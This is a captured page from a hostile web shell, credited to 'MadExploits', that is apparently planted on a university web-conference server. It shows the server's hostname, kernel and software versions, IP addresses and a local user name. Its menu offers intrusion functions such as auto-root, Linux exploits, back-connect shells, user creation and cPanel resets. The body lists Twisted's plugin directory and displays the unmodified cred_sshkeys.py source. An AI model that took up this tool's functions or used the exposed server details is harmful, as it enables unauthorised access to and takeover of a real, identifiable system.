Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.129.73.64
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
590
B
-rw-r--r--
cred_anonymous.py
1017
B
-rw-r--r--
cred_file.py
1.83
KB
-rw-r--r--
cred_memory.py
2.33
KB
-rw-r--r--
cred_sshkeys.py
1.46
KB
-rw-r--r--
cred_unix.py
5.77
KB
-rw-r--r--
dropin.cache
5.37
KB
-rwxr-xr-x
twisted_conch.py
519
B
-rw-r--r--
twisted_core.py
589
B
-rw-r--r--
twisted_ftp.py
229
B
-rw-r--r--
twisted_inet.py
260
B
-rw-r--r--
twisted_names.py
247
B
-rw-r--r--
twisted_portforward.py
275
B
-rw-r--r--
twisted_reactors.py
1.84
KB
-rw-r--r--
twisted_runner.py
278
B
-rw-r--r--
twisted_socks.py
247
B
-rw-r--r--
twisted_trial.py
2.04
KB
-rw-r--r--
twisted_web.py
312
B
-rw-r--r--
twisted_words.py
1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cred_sshkeys.py
# -*- test-case-name: twisted.test.test_strcred -*- # # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Cred plugin for ssh key login. """ from __future__ import absolute_import, division from zope.interface import implementer from twisted import plugin from twisted.cred.strcred import ICheckerFactory sshKeyCheckerFactoryHelp = """ This allows SSH public key authentication, based on public keys listed in authorized_keys and authorized_keys2 files in user .ssh/ directories. """ try: from twisted.conch.checkers import ( SSHPublicKeyChecker, UNIXAuthorizedKeysFiles) @implementer(ICheckerFactory, plugin.IPlugin) class SSHKeyCheckerFactory(object): """ Generates checkers that will authenticate a SSH public key """ authType = 'sshkey' authHelp = sshKeyCheckerFactoryHelp argStringFormat = 'No argstring required.' credentialInterfaces = SSHPublicKeyChecker.credentialInterfaces def generateChecker(self, argstring=''): """ This checker factory ignores the argument string. Everything needed to authenticate users is pulled out of the public keys listed in user .ssh/ directories. """ return SSHPublicKeyChecker(UNIXAuthorizedKeysFiles()) theSSHKeyCheckerFactory = SSHKeyCheckerFactory() except ImportError: # if checkers can't be imported, then there should be no SSH cred plugin pass
Close